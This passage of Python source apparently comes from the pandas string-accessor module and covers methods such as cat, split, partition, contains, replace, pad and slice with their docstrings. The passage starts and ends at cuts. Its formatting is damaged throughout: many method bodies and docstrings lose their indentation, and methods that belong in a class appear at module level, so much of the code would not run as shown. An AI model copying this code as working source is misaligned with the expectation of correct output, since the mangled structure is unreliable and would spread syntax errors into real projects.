            others = DataFrame(others, index=idx)
            return [others[x] for x in others]
        elif is_list_like(others, allow_sets=False):
            others = list(others) # ensure iterators do not get read twice etc
            # in case of list-like `others`, all elements must be
            # either Series/Index/np.ndarray (1-dim)...
            if all(
                isinstance(x, (ABCSeries, ABCIndex))
                or (isinstance(x, np.ndarray) and x.ndim == 1)
                for x in others
            ):
                los: List[Series] = []
                while others: # iterate through list and append each element
                    los = los + self._get_series_list(others.pop(0))
                return los
            # ... or just strings
            elif all(not is_list_like(x) for x in others):
                return [Series(others, index=idx)]
        raise TypeError(
            "others must be Series, Index, DataFrame, np.ndarray "
            "or list-like (either containing only strings or "
            "containing only objects of type Series/Index/"
            "np.ndarray[1-dim])"
        )
    @forbid_nonstring_types(["bytes", "mixed", "mixed-integer"])
    def cat(self, others=None, sep=None, na_rep=None, join="left"):
        """
        Concatenate strings in the Series/Index with given separator.
        If `others` is specified, this function concatenates the Series/Index
        and elements of `others` element-wise.
        If `others` is not passed, then all values in the Series/Index are
        concatenated into a single string with a given `sep`.
        Parameters
        ----------
        others : Series, Index, DataFrame, np.ndarray or list-like
            Series, Index, DataFrame, np.ndarray (one- or two-dimensional) and
            other list-likes of strings must have the same length as the
            calling Series/Index, with the exception of indexed objects (i.e.
            Series/Index/DataFrame) if `join` is not None.
            If others is a list-like that contains a combination of Series,
            Index or np.ndarray (1-dim), then all elements will be unpacked and
            must satisfy the above criteria individually.
            If others is None, the method returns the concatenation of all
            strings in the calling Series/Index.
        sep : str, default ''
            The separator between the different elements/columns. By default
            the empty string `''` is used.
        na_rep : str or None, default None
            Representation that is inserted for all missing values:
            - If `na_rep` is None, and `others` is None, missing values in the
              Series/Index are omitted from the result.
            - If `na_rep` is None, and `others` is not None, a row containing a
              missing value in any of the columns (before concatenation) will
              have a missing value in the result.
        join : {'left', 'right', 'outer', 'inner'}, default 'left'
            Determines the join-style between the calling Series/Index and any
            Series/Index/DataFrame in `others` (objects without an index need
            to match the length of the calling Series/Index). To disable
            alignment, use `.values` on any Series/Index/DataFrame in `others`.
            .. versionadded:: 0.23.0
            .. versionchanged:: 1.0.0
                Changed default of `join` from None to `'left'`.
        Returns
        -------
        str, Series or Index
            If `others` is None, `str` is returned, otherwise a `Series/Index`
            (same type as caller) of objects is returned.
        See Also
        --------
        split : Split each string in the Series/Index.
        join : Join lists contained as elements in the Series/Index.
        Examples
        --------
        When not passing `others`, all values are concatenated into a single
        string:
        >>> s = pd.Series(['a', 'b', np.nan, 'd'])
        >>> s.str.cat(sep=' ')
        'a b d'
        By default, NA values in the Series are ignored. Using `na_rep`, they
        can be given a representation:
        >>> s.str.cat(sep=' ', na_rep='?')
        'a b ? d'
        If `others` is specified, corresponding values are concatenated with
        the separator. Result will be a Series of strings.
        >>> s.str.cat(['A', 'B', 'C', 'D'], sep=',')
        0    a,A
        1    b,B
        2    NaN
        3    d,D
        dtype: object
        Missing values will remain missing in the result, but can again be
        represented using `na_rep`
        >>> s.str.cat(['A', 'B', 'C', 'D'], sep=',', na_rep='-')
        0    a,A
        1    b,B
        2    -,C
        3    d,D
        dtype: object
        If `sep` is not specified, the values are concatenated without
        separation.
        >>> s.str.cat(['A', 'B', 'C', 'D'], na_rep='-')
        0    aA
        1    bB
        2    -C
        3    dD
        dtype: object
        Series with different indexes can be aligned before concatenation. The
        `join`-keyword works as in other methods.
        >>> t = pd.Series(['d', 'a', 'e', 'c'], index=[3, 0, 4, 2])
        >>> s.str.cat(t, join='left', na_rep='-')
        0    aa
        1    b-
        2    -c
        3    dd
        dtype: object
        >>>
        >>> s.str.cat(t, join='outer', na_rep='-')
        0    aa
        1    b-
        2    -c
        3    dd
        4    -e
        dtype: object
        >>>
        >>> s.str.cat(t, join='inner', na_rep='-')
        0    aa
        2    -c
        3    dd
        dtype: object
        >>>
        >>> s.str.cat(t, join='right', na_rep='-')
        3    dd
        0    aa
        4    -e
        2    -c
        dtype: object
        For more examples, see :ref:`here <text.concatenate>`.
        """
        # TODO: dispatch
        from pandas import (
            Index,
            Series,
            concat,
        )
        if isinstance(others, str):
            raise ValueError("Did you mean to supply a `sep` keyword?")
        if sep is None:
            sep = ""
        if isinstance(self._orig, ABCIndex):
            # work on an index-backed Series so alignment machinery applies
            data = Series(self._orig, index=self._orig)
        else: # Series
            data = self._orig
        # concatenate Series/Index with itself if no "others"
        if others is None:
            # error: Incompatible types in assignment (expression has type
            # "ndarray", variable has type "Series")
            data = ensure_object(data) # type: ignore[assignment]
            na_mask = isna(data)
            if na_rep is None and na_mask.any():
                # no na_rep: drop missing values from the joined output
                data = data[~na_mask]
            elif na_rep is not None and na_mask.any():
                data = np.where(na_mask, na_rep, data)
            return sep.join(data)
        try:
            # turn anything in "others" into lists of Series
            others = self._get_series_list(others)
        except ValueError as err: # do not catch TypeError raised by _get_series_list
            raise ValueError(
                "If `others` contains arrays or lists (or other "
                "list-likes without an index), these must all be "
                "of the same length as the calling Series/Index."
            ) from err
        # align if required
        if any(not data.index.equals(x.index) for x in others):
            # Need to add keys for uniqueness in case of duplicate columns
            others = concat(
                others,
                axis=1,
                join=(join if join == "inner" else "outer"),
                keys=range(len(others)),
                sort=False,
                copy=False,
            )
            data, others = data.align(others, join=join)
            others = [others[x] for x in others] # again list of Series
        all_cols = [ensure_object(x) for x in [data] + others]
        na_masks = np.array([isna(x) for x in all_cols])
        union_mask = np.logical_or.reduce(na_masks, axis=0)
        if na_rep is None and union_mask.any():
            # no na_rep means NaNs for all rows where any column has a NaN
            # only necessary if there are actually any NaNs
            result = np.empty(len(data), dtype=object)
            np.putmask(result, union_mask, np.nan)
            not_masked = ~union_mask
            result[not_masked] = cat_safe([x[not_masked] for x in all_cols], sep)
        elif na_rep is not None and union_mask.any():
            # fill NaNs with na_rep in case there are actually any NaNs
            all_cols = [
                np.where(nm, na_rep, col) for nm, col in zip(na_masks, all_cols)
            ]
            result = cat_safe(all_cols, sep)
        else:
            # no NaNs - can just concatenate
            result = cat_safe(all_cols, sep)
        if isinstance(self._orig, ABCIndex):
            # add dtype for case that result is all-NA
            # error: Incompatible types in assignment (expression has type
            # "Index", variable has type "ndarray")
            result = Index( # type: ignore[assignment]
                result, dtype=object, name=self._orig.name
            )
        else: # Series
            if is_categorical_dtype(self._orig.dtype):
                # We need to infer the new categories.
                dtype = None
            else:
                dtype = self._orig.dtype
            # error: Incompatible types in assignment (expression has type
            # "Series", variable has type "ndarray")
            result = Series( # type: ignore[assignment]
                result, dtype=dtype, index=data.index, name=self._orig.name
            )
            # error: "ndarray" has no attribute "__finalize__"
            result = result.__finalize__( # type: ignore[attr-defined]
                self._orig, method="str_cat"
            )
        return result
_shared_docs[
"str_split"
] = r"""
Split strings around given separator/delimiter.
Splits the string in the Series/Index from the %(side)s,
at the specified delimiter string. Equivalent to :meth:`str.%(method)s`.
Parameters
----------
pat : str, optional
String or regular expression to split on.
If not specified, split on whitespace.
n : int, default -1 (all)
Limit number of splits in output.
``None``, 0 and -1 will be interpreted as return all splits.
expand : bool, default False
Expand the split strings into separate columns.
* If ``True``, return DataFrame/MultiIndex expanding dimensionality.
* If ``False``, return Series/Index, containing lists of strings.
Returns
-------
Series, Index, DataFrame or MultiIndex
Type matches caller unless ``expand=True`` (see Notes).
See Also
--------
Series.str.split : Split strings around given separator/delimiter.
Series.str.rsplit : Splits string around given separator/delimiter,
starting from the right.
Series.str.join : Join lists contained as elements in the Series/Index
with passed delimiter.
str.split : Standard library version for split.
str.rsplit : Standard library version for rsplit.
Notes
-----
The handling of the `n` keyword depends on the number of found splits:
- If found splits > `n`, make first `n` splits only
- If found splits <= `n`, make all splits
- If for a certain row the number of found splits < `n`,
append `None` for padding up to `n` if ``expand=True``
If using ``expand=True``, Series and Index callers return DataFrame and
MultiIndex objects, respectively.
Examples
--------
>>> s = pd.Series(
... [
... "this is a regular sentence",
... "https://docs.python.org/3/tutorial/index.html",
... np.nan
... ]
... )
>>> s
0 this is a regular sentence
1 https://docs.python.org/3/tutorial/index.html
2 NaN
dtype: object
In the default setting, the string is split by whitespace.
>>> s.str.split()
0 [this, is, a, regular, sentence]
1 [https://docs.python.org/3/tutorial/index.html]
2 NaN
dtype: object
Without the `n` parameter, the outputs of `rsplit` and `split`
are identical.
>>> s.str.rsplit()
0 [this, is, a, regular, sentence]
1 [https://docs.python.org/3/tutorial/index.html]
2 NaN
dtype: object
The `n` parameter can be used to limit the number of splits on the
delimiter. The outputs of `split` and `rsplit` are different.
>>> s.str.split(n=2)
0 [this, is, a regular sentence]
1 [https://docs.python.org/3/tutorial/index.html]
2 NaN
dtype: object
>>> s.str.rsplit(n=2)
0 [this is a, regular, sentence]
1 [https://docs.python.org/3/tutorial/index.html]
2 NaN
dtype: object
The `pat` parameter can be used to split by other characters.
>>> s.str.split(pat="/")
0 [this is a regular sentence]
1 [https:, , docs.python.org, 3, tutorial, index...
2 NaN
dtype: object
When using ``expand=True``, the split elements will expand out into
separate columns. If NaN is present, it is propagated throughout
the columns during the split.
>>> s.str.split(expand=True)
0 1 2 3 4
0 this is a regular sentence
1 https://docs.python.org/3/tutorial/index.html None None None None
2 NaN NaN NaN NaN NaN
For slightly more complex use cases like splitting the html document name
from a url, a combination of parameter settings can be used.
>>> s.str.rsplit("/", n=1, expand=True)
0 1
0 this is a regular sentence None
1 https://docs.python.org/3/tutorial index.html
2 NaN NaN
Remember to escape special characters when explicitly using regular
expressions.
>>> s = pd.Series(["1+1=2"])
>>> s
0 1+1=2
dtype: object
>>> s.str.split(r"\+|=", expand=True)
0 1 2
0 1 1 2
"""
    @Appender(_shared_docs["str_split"] % {"side": "beginning", "method": "split"})
    @forbid_nonstring_types(["bytes"])
    def split(self, pat=None, n=-1, expand=False):
        # Docstring is supplied by @Appender from the shared template above.
        result = self._data.array._str_split(pat, n, expand)
        return self._wrap_result(result, returns_string=expand, expand=expand)
@Appender(_shared_docs["str_split"] % {"side": "end", "method": "rsplit"})
@forbid_nonstring_types(["bytes"])
def rsplit(self, pat=None, n=-1, expand=False):
result = self._data.array._str_rsplit(pat, n=n)
return self._wrap_result(result, expand=expand, returns_string=expand)
# Shared docstring template for ``partition``/``rpartition``.  The
# %(side)s, %(return)s and %(also)s placeholders are substituted via
# ``@Appender`` on each method below; the text itself is runtime data,
# so it must not be edited casually.
_shared_docs[
    "str_partition"
] = """
Split the string at the %(side)s occurrence of `sep`.
This method splits the string at the %(side)s occurrence of `sep`,
and returns 3 elements containing the part before the separator,
the separator itself, and the part after the separator.
If the separator is not found, return %(return)s.
Parameters
----------
sep : str, default whitespace
String to split on.
expand : bool, default True
If True, return DataFrame/MultiIndex expanding dimensionality.
If False, return Series/Index.
Returns
-------
DataFrame/MultiIndex or Series/Index of objects
See Also
--------
%(also)s
Series.str.split : Split strings around given separators.
str.partition : Standard library version.
Examples
--------
>>> s = pd.Series(['Linda van der Berg', 'George Pitt-Rivers'])
>>> s
0 Linda van der Berg
1 George Pitt-Rivers
dtype: object
>>> s.str.partition()
0 1 2
0 Linda van der Berg
1 George Pitt-Rivers
To partition by the last space instead of the first one:
>>> s.str.rpartition()
0 1 2
0 Linda van der Berg
1 George Pitt-Rivers
To partition by something different than a space:
>>> s.str.partition('-')
0 1 2
0 Linda van der Berg
1 George Pitt - Rivers
To return a Series containing tuples instead of a DataFrame:
>>> s.str.partition('-', expand=False)
0 (Linda van der Berg, , )
1 (George Pitt, -, Rivers)
dtype: object
Also available on indices:
>>> idx = pd.Index(['X 123', 'Y 999'])
>>> idx
Index(['X 123', 'Y 999'], dtype='object')
Which will create a MultiIndex:
>>> idx.str.partition()
MultiIndex([('X', ' ', '123'),
('Y', ' ', '999')],
)
Or an index with tuples with ``expand=False``:
>>> idx.str.partition(expand=False)
Index([('X', ' ', '123'), ('Y', ' ', '999')], dtype='object')
"""
@Appender(
    _shared_docs["str_partition"]
    % {
        "side": "first",
        "return": "3 elements containing the string itself, followed by two "
        "empty strings",
        "also": "rpartition : Split the string at the last occurrence of `sep`.",
    }
)
@forbid_nonstring_types(["bytes"])
def partition(self, sep=" ", expand=True):
    # Delegate to the backing array; with expand=True the three parts
    # become a DataFrame (or MultiIndex when called on an Index).
    parts = self._data.array._str_partition(sep, expand)
    return self._wrap_result(parts, expand=expand, returns_string=expand)
@Appender(
    _shared_docs["str_partition"]
    % {
        "side": "last",
        "return": "3 elements containing two empty strings, followed by the "
        "string itself",
        "also": "partition : Split the string at the first occurrence of `sep`.",
    }
)
@forbid_nonstring_types(["bytes"])
def rpartition(self, sep=" ", expand=True):
    # Mirror of ``partition`` searching from the right-hand side.
    parts = self._data.array._str_rpartition(sep, expand)
    return self._wrap_result(parts, expand=expand, returns_string=expand)
def get(self, i):
    """
    Extract element from each component at specified position.

    Extract element from lists, tuples, or strings in each element in the
    Series/Index.

    Parameters
    ----------
    i : int
        Position of element to extract.

    Returns
    -------
    Series or Index

    Examples
    --------
    >>> s = pd.Series(["String", (1, 2, 3), ["a", "b", "c"]])
    >>> s.str.get(1)
    0    t
    1    2
    2    b
    dtype: object

    Missing positions (or non-indexable elements) yield NaN/None.
    """
    # Delegation: per-element positional lookup happens in the array layer.
    return self._wrap_result(self._data.array._str_get(i))
@forbid_nonstring_types(["bytes"])
def join(self, sep):
"""
Join lists contained as elements in the Series/Index with passed delimiter.
If the elements of a Series are lists themselves, join the content of these
lists using the delimiter passed to the function.
This function is an equivalent to :meth:`str.join`.
Parameters
----------
sep : str
Delimiter to use between list entries.
Returns
-------
Series/Index: object
The list entries concatenated by intervening occurrences of the
delimiter.
Raises
------
AttributeError
If the supplied Series contains neither strings nor lists.
See Also
--------
str.join : Standard library version of this method.
Series.str.split : Split strings around given separator/delimiter.
Notes
-----
If any of the list items is not a string object, the result of the join
will be `NaN`.
Examples
--------
Example with a list that contains non-string elements.
>>> s = pd.Series([['lion', 'elephant', 'zebra'],
... [1.1, 2.2, 3.3],
... ['cat', np.nan, 'dog'],
... ['cow', 4.5, 'goat'],
... ['duck', ['swan', 'fish'], 'guppy']])
>>> s
0 [lion, elephant, zebra]
1 [1.1, 2.2, 3.3]
2 [cat, nan, dog]
3 [cow, 4.5, goat]
4 [duck, [swan, fish], guppy]
dtype: object
Join all lists using a '-'. The lists containing object(s) of types other
than str will produce a NaN.
>>> s.str.join('-')
0 lion-elephant-zebra
1 NaN
2 NaN
3 NaN
4 NaN
dtype: object
"""
result = self._data.array._str_join(sep)
return self._wrap_result(result)
@forbid_nonstring_types(["bytes"])
def contains(self, pat, case=True, flags=0, na=None, regex=True):
r"""
Test if pattern or regex is contained within a string of a Series or Index.
Return boolean Series or Index based on whether a given pattern or regex is
contained within a string of a Series or Index.
Parameters
----------
pat : str
Character sequence or regular expression.
case : bool, default True
If True, case sensitive.
flags : int, default 0 (no flags)
Flags to pass through to the re module, e.g. re.IGNORECASE.
na : scalar, optional
Fill value for missing values. The default depends on dtype of the
array. For object-dtype, ``numpy.nan`` is used. For ``StringDtype``,
``pandas.NA`` is used.
regex : bool, default True
If True, assumes the pat is a regular expression.
If False, treats the pat as a literal string.
Returns
-------
Series or Index of boolean values
A Series or Index of boolean values indicating whether the
given pattern is contained within the string of each element
of the Series or Index.
See Also
--------
match : Analogous, but stricter, relying on re.match instead of re.search.
Series.str.startswith : Test if the start of each string element matches a
pattern.
Series.str.endswith : Same as startswith, but tests the end of string.
Examples
--------
Returning a Series of booleans using only a literal pattern.
>>> s1 = pd.Series(['Mouse', 'dog', 'house and parrot', '23', np.NaN])
>>> s1.str.contains('og', regex=False)
0 False
1 True
2 False
3 False
4 NaN
dtype: object
Returning an Index of booleans using only a literal pattern.
>>> ind = pd.Index(['Mouse', 'dog', 'house and parrot', '23.0', np.NaN])
>>> ind.str.contains('23', regex=False)
Index([False, False, False, True, nan], dtype='object')
Specifying case sensitivity using `case`.
>>> s1.str.contains('oG', case=True, regex=True)
0 False
1 False
2 False
3 False
4 NaN
dtype: object
Specifying `na` to be `False` instead of `NaN` replaces NaN values
with `False`. If Series or Index does not contain NaN values
the resultant dtype will be `bool`, otherwise, an `object` dtype.
>>> s1.str.contains('og', na=False, regex=True)
0 False
1 True
2 False
3 False
4 False
dtype: bool
Returning 'house' or 'dog' when either expression occurs in a string.
>>> s1.str.contains('house|dog', regex=True)
0 False
1 True
2 True
3 False
4 NaN
dtype: object
Ignoring case sensitivity using `flags` with regex.
>>> import re
>>> s1.str.contains('PARROT', flags=re.IGNORECASE, regex=True)
0 False
1 False
2 True
3 False
4 NaN
dtype: object
Returning any digit using regular expression.
>>> s1.str.contains('\\d', regex=True)
0 False
1 False
2 False
3 True
4 NaN
dtype: object
Ensure `pat` is a not a literal pattern when `regex` is set to True.
Note in the following example one might expect only `s2[1]` and `s2[3]` to
return `True`. However, '.0' as a regex matches any character
followed by a 0.
>>> s2 = pd.Series(['40', '40.0', '41', '41.0', '35'])
>>> s2.str.contains('.0', regex=True)
0 True
1 True
2 False
3 True
4 False
dtype: bool
"""
if regex and re.compile(pat).groups:
warnings.warn(
"This pattern has match groups. To actually get the "
"groups, use str.extract.",
UserWarning,
stacklevel=3,
)
result = self._data.array._str_contains(pat, case, flags, na, regex)
return self._wrap_result(result, fill_value=na, returns_string=False)
@forbid_nonstring_types(["bytes"])
def match(self, pat, case=True, flags=0, na=None):
"""
Determine if each string starts with a match of a regular expression.
Parameters
----------
pat : str
Character sequence or regular expression.
case : bool, default True
If True, case sensitive.
flags : int, default 0 (no flags)
Regex module flags, e.g. re.IGNORECASE.
na : scalar, optional
Fill value for missing values. The default depends on dtype of the
array. For object-dtype, ``numpy.nan`` is used. For ``StringDtype``,
``pandas.NA`` is used.
Returns
-------
Series/array of boolean values
See Also
--------
fullmatch : Stricter matching that requires the entire string to match.
contains : Analogous, but less strict, relying on re.search instead of
re.match.
extract : Extract matched groups.
"""
result = self._data.array._str_match(pat, case=case, flags=flags, na=na)
return self._wrap_result(result, fill_value=na, returns_string=False)
@forbid_nonstring_types(["bytes"])
def fullmatch(self, pat, case=True, flags=0, na=None):
"""
Determine if each string entirely matches a regular expression.
.. versionadded:: 1.1.0
Parameters
----------
pat : str
Character sequence or regular expression.
case : bool, default True
If True, case sensitive.
flags : int, default 0 (no flags)
Regex module flags, e.g. re.IGNORECASE.
na : scalar, optional.
Fill value for missing values. The default depends on dtype of the
array. For object-dtype, ``numpy.nan`` is used. For ``StringDtype``,
``pandas.NA`` is used.
Returns
-------
Series/array of boolean values
See Also
--------
match : Similar, but also returns `True` when only a *prefix* of the string
matches the regular expression.
extract : Extract matched groups.
"""
result = self._data.array._str_fullmatch(pat, case=case, flags=flags, na=na)
return self._wrap_result(result, fill_value=na, returns_string=False)
@forbid_nonstring_types(["bytes"])
def replace(self, pat, repl, n=-1, case=None, flags=0, regex=None):
r"""
Replace each occurrence of pattern/regex in the Series/Index.
Equivalent to :meth:`str.replace` or :func:`re.sub`, depending on
the regex value.
Parameters
----------
pat : str or compiled regex
String can be a character sequence or regular expression.
repl : str or callable
Replacement string or a callable. The callable is passed the regex
match object and must return a replacement string to be used.
See :func:`re.sub`.
n : int, default -1 (all)
Number of replacements to make from start.
case : bool, default None
Determines if replace is case sensitive:
- If True, case sensitive (the default if `pat` is a string)
- Set to False for case insensitive
- Cannot be set if `pat` is a compiled regex.
flags : int, default 0 (no flags)
Regex module flags, e.g. re.IGNORECASE. Cannot be set if `pat` is a compiled
regex.
regex : bool, default True
Determines if assumes the passed-in pattern is a regular expression:
- If True, assumes the passed-in pattern is a regular expression.
- If False, treats the pattern as a literal string
- Cannot be set to False if `pat` is a compiled regex or `repl` is
a callable.
.. versionadded:: 0.23.0
Returns
-------
Series or Index of object
A copy of the object with all matching occurrences of `pat` replaced by
`repl`.
Raises
------
ValueError
* if `regex` is False and `repl` is a callable or `pat` is a compiled
regex
* if `pat` is a compiled regex and `case` or `flags` is set
Notes
-----
When `pat` is a compiled regex, all flags should be included in the
compiled regex. Use of `case`, `flags`, or `regex=False` with a compiled
regex will raise an error.
Examples
--------
When `pat` is a string and `regex` is True (the default), the given `pat`
is compiled as a regex. When `repl` is a string, it replaces matching
regex patterns as with :meth:`re.sub`. NaN value(s) in the Series are
left as is:
>>> pd.Series(['foo', 'fuz', np.nan]).str.replace('f.', 'ba', regex=True)
0 bao
1 baz
2 NaN
dtype: object
When `pat` is a string and `regex` is False, every `pat` is replaced with
`repl` as with :meth:`str.replace`:
>>> pd.Series(['f.o', 'fuz', np.nan]).str.replace('f.', 'ba', regex=False)
0 bao
1 fuz
2 NaN
dtype: object
When `repl` is a callable, it is called on every `pat` using
:func:`re.sub`. The callable should expect one positional argument
(a regex object) and return a string.
To get the idea:
>>> pd.Series(['foo', 'fuz', np.nan]).str.replace('f', repr)
0 <re.Match object; span=(0, 1), match='f'>oo
1 <re.Match object; span=(0, 1), match='f'>uz
2 NaN
dtype: object
Reverse every lowercase alphabetic word:
>>> repl = lambda m: m.group(0)[::-1]
>>> pd.Series(['foo 123', 'bar baz', np.nan]).str.replace(r'[a-z]+', repl)
0 oof 123
1 rab zab
2 NaN
dtype: object
Using regex groups (extract second group and swap case):
>>> pat = r"(?P<one>\w+) (?P<two>\w+) (?P<three>\w+)"
>>> repl = lambda m: m.group('two').swapcase()
>>> pd.Series(['One Two Three', 'Foo Bar Baz']).str.replace(pat, repl)
0 tWO
1 bAR
dtype: object
Using a compiled regex with flags
>>> import re
>>> regex_pat = re.compile(r'FUZ', flags=re.IGNORECASE)
>>> pd.Series(['foo', 'fuz', np.nan]).str.replace(regex_pat, 'bar')
0 foo
1 bar
2 NaN
dtype: object
"""
if regex is None:
if isinstance(pat, str) and any(c in pat for c in ".+*|^$?[](){}\\"):
# warn only in cases where regex behavior would differ from literal
msg = (
"The default value of regex will change from True to False "
"in a future version."
)
if len(pat) == 1:
msg += (
" In addition, single character regular expressions will"
"*not* be treated as literal strings when regex=True."
)
warnings.warn(msg, FutureWarning, stacklevel=3)
regex = True
# Check whether repl is valid (GH 13438, GH 15055)
if not (isinstance(repl, str) or callable(repl)):
raise TypeError("repl must be a string or callable")
is_compiled_re = is_re(pat)
if regex:
if is_compiled_re:
if (case is not None) or (flags != 0):
raise ValueError(
"case and flags cannot be set when pat is a compiled regex"
)
elif case is None:
# not a compiled regex, set default case
case = True
elif is_compiled_re:
raise ValueError(
"Cannot use a compiled regex as replacement pattern with regex=False"
)
elif callable(repl):
raise ValueError("Cannot use a callable replacement when regex=False")
result = self._data.array._str_replace(
pat, repl, n=n, case=case, flags=flags, regex=regex
)
return self._wrap_result(result)
@forbid_nonstring_types(["bytes"])
def repeat(self, repeats):
"""
Duplicate each string in the Series or Index.
Parameters
----------
repeats : int or sequence of int
Same value for all (int) or different value per (sequence).
Returns
-------
Series or Index of object
Series or Index of repeated string objects specified by
input parameter repeats.
Examples
--------
>>> s = pd.Series(['a', 'b', 'c'])
>>> s
0 a
1 b
2 c
dtype: object
Single int repeats string in Series
>>> s.str.repeat(repeats=2)
0 aa
1 bb
2 cc
dtype: object
Sequence of int repeats corresponding string in Series
>>> s.str.repeat(repeats=[1, 2, 3])
0 a
1 bb
2 ccc
dtype: object
"""
result = self._data.array._str_repeat(repeats)
return self._wrap_result(result)
@forbid_nonstring_types(["bytes"])
def pad(self, width, side="left", fillchar=" "):
"""
Pad strings in the Series/Index up to width.
Parameters
----------
width : int
Minimum width of resulting string; additional characters will be filled
with character defined in `fillchar`.
side : {'left', 'right', 'both'}, default 'left'
Side from which to fill resulting string.
fillchar : str, default ' '
Additional character for filling, default is whitespace.
Returns
-------
Series or Index of object
Returns Series or Index with minimum number of char in object.
See Also
--------
Series.str.rjust : Fills the left side of strings with an arbitrary
character. Equivalent to ``Series.str.pad(side='left')``.
Series.str.ljust : Fills the right side of strings with an arbitrary
character. Equivalent to ``Series.str.pad(side='right')``.
Series.str.center : Fills both sides of strings with an arbitrary
character. Equivalent to ``Series.str.pad(side='both')``.
Series.str.zfill : Pad strings in the Series/Index by prepending '0'
character. Equivalent to ``Series.str.pad(side='left', fillchar='0')``.
Examples
--------
>>> s = pd.Series(["caribou", "tiger"])
>>> s
0 caribou
1 tiger
dtype: object
>>> s.str.pad(width=10)
0 caribou
1 tiger
dtype: object
>>> s.str.pad(width=10, side='right', fillchar='-')
0 caribou---
1 tiger-----
dtype: object
>>> s.str.pad(width=10, side='both', fillchar='-')
0 -caribou--
1 --tiger---
dtype: object
"""
if not isinstance(fillchar, str):
msg = f"fillchar must be a character, not {type(fillchar).__name__}"
raise TypeError(msg)
if len(fillchar) != 1:
raise TypeError("fillchar must be a character, not str")
if not is_integer(width):
msg = f"width must be of integer type, not {type(width).__name__}"
raise TypeError(msg)
result = self._data.array._str_pad(width, side=side, fillchar=fillchar)
return self._wrap_result(result)
# Shared docstring template for ``center``/``ljust``/``rjust``; the
# %(side)s and %(method)s placeholders are substituted via ``@Appender``
# on each method below.  The text itself is runtime data.
_shared_docs[
    "str_pad"
] = """
Pad %(side)s side of strings in the Series/Index.
Equivalent to :meth:`str.%(method)s`.
Parameters
----------
width : int
Minimum width of resulting string; additional characters will be filled
with ``fillchar``.
fillchar : str
Additional character for filling, default is whitespace.
Returns
-------
filled : Series/Index of objects.
"""
@Appender(_shared_docs["str_pad"] % {"side": "left and right", "method": "center"})
@forbid_nonstring_types(["bytes"])
def center(self, width, fillchar=" "):
return self.pad(width, side="both", fillchar=fillchar)
@Appender(_shared_docs["str_pad"] % {"side": "right", "method": "ljust"})
@forbid_nonstring_types(["bytes"])
def ljust(self, width, fillchar=" "):
return self.pad(width, side="right", fillchar=fillchar)
@Appender(_shared_docs["str_pad"] % {"side": "left", "method": "rjust"})
@forbid_nonstring_types(["bytes"])
def rjust(self, width, fillchar=" "):
return self.pad(width, side="left", fillchar=fillchar)
@forbid_nonstring_types(["bytes"])
def zfill(self, width):
"""
Pad strings in the Series/Index by prepending '0' characters.
Strings in the Series/Index are padded with '0' characters on the
left of the string to reach a total string length `width`. Strings
in the Series/Index with length greater or equal to `width` are
unchanged.
Parameters
----------
width : int
Minimum length of resulting string; strings with length less
than `width` be prepended with '0' characters.
Returns
-------
Series/Index of objects.
See Also
--------
Series.str.rjust : Fills the left side of strings with an arbitrary
character.
Series.str.ljust : Fills the right side of strings with an arbitrary
character.
Series.str.pad : Fills the specified sides of strings with an arbitrary
character.
Series.str.center : Fills both sides of strings with an arbitrary
character.
Notes
-----
Differs from :meth:`str.zfill` which has special handling
for '+'/'-' in the string.
Examples
--------
>>> s = pd.Series(['-1', '1', '1000', 10, np.nan])
>>> s
0 -1
1 1
2 1000
3 10
4 NaN
dtype: object
Note that ``10`` and ``NaN`` are not strings, therefore they are
converted to ``NaN``. The minus sign in ``'-1'`` is treated as a
regular character and the zero is added to the left of it
(:meth:`str.zfill` would have moved it to the left). ``1000``
remains unchanged as it is longer than `width`.
>>> s.str.zfill(3)
0 0-1
1 001
2 1000
3 NaN
4 NaN
dtype: object
"""
result = self.pad(width, side="left", fillchar="0")
return self._wrap_result(result)
def slice(self, start=None, stop=None, step=None):
    """
    Slice substrings from each element in the Series or Index.

    Parameters
    ----------
    start : int, optional
        Start position for slice operation.
    stop : int, optional
        Stop position for slice operation.
    step : int, optional
        Step size for slice operation.

    Returns
    -------
    Series or Index of object
        Series or Index from sliced substring from original string object.

    See Also
    --------
    Series.str.slice_replace : Replace a slice with a string.
    Series.str.get : Return element at position.
        Equivalent to `Series.str.slice(start=i, stop=i+1)` with `i`
        being the position.

    Examples
    --------
    >>> s = pd.Series(["koala", "dog", "chameleon"])
    >>> s.str.slice(start=1)
    0        oala
    1          og
    2    hameleon
    dtype: object

    >>> s.str.slice(start=0, stop=5, step=3)
    0    kl
    1     d
    2    cm
    dtype: object

    Equivalent behaviour to ``s.str[0:5:3]``.
    """
    # Positional slicing per element is delegated to the array layer.
    sliced = self._data.array._str_slice(start, stop, step)
    return self._wrap_result(sliced)
@forbid_nonstring_types(["bytes"])
def slice_replace(self, start=None, stop=None, repl=None):
"""
Replace a positional slice of a string with another value.
Parameters
----------
start : int, optional
Left index position to use for the slice. If not specified (None),
the slice is unbounded on the left, i.e. slice from the start
of the string.
stop : int, optional
Right index position to use for the slice. If not specified (None),
the slice is unbounded on the right, i.e. slice until the
end of the string.
repl : str, optional
String for replacement. If not specified (None), the sliced region
is replaced with an empty string.
Returns
-------
Series or Index
Same type as the original object.
See Also
--------
Series.str.slice : Just slicing without replacement.
Examples
--------
>>> s = pd.Series(['a', 'ab', 'abc', 'abdc', 'abcde'])
>>> s
0 a
1 ab
2 abc
3 abdc
4 abcde
dtype: object
Specify just `start`, meaning replace `start` until the end of the
string with `repl`.
>>> s.str.slice_replace(1, repl='X')
0 aX
1 aX
2 aX
3 aX
4 aX
dtype: object
Specify just `stop`, meaning the start of the string to `stop` is replaced
with `repl`, and the rest of the string is included.
>>> s.str.slice_replace(stop=2, repl='X')
0 X
1 X
2 Xc
3 Xdc
4 Xcde
dtype: object
Specify `start` and `stop`, meaning the slice from `start` to `stop` is
replaced with `repl`. Everything before or after `start` and `stop` is
included as is.
>>> s.str.slice_replace(start=1, stop=3, repl='X')
0 aX
1 aX
2 aX
3 aXc
4 aXde
dtype: object
"""
result = self._data.array._str_slice_replace(start, stop, repl)
return self._wrap_result(result)
def decode(self, encoding, errors="strict"):
    """
    Decode character string in the Series/Index using indicated encoding.

    Equivalent to :meth:`str.decode` in python2 and :meth:`bytes.decode`
    in python3.

    Parameters
    ----------
    encoding : str
    errors : str, optional

    Returns
    -------
    Series or Index
    """
    # TODO: Add a similar _bytes interface.
    if encoding in _cpython_optimized_decoders:
        # CPython optimized implementation: call bytes.decode directly.
        def _decode_one(x):
            return x.decode(encoding, errors)

    else:
        codec = codecs.getdecoder(encoding)

        def _decode_one(x):
            # getdecoder returns (decoded, length_consumed); keep the text.
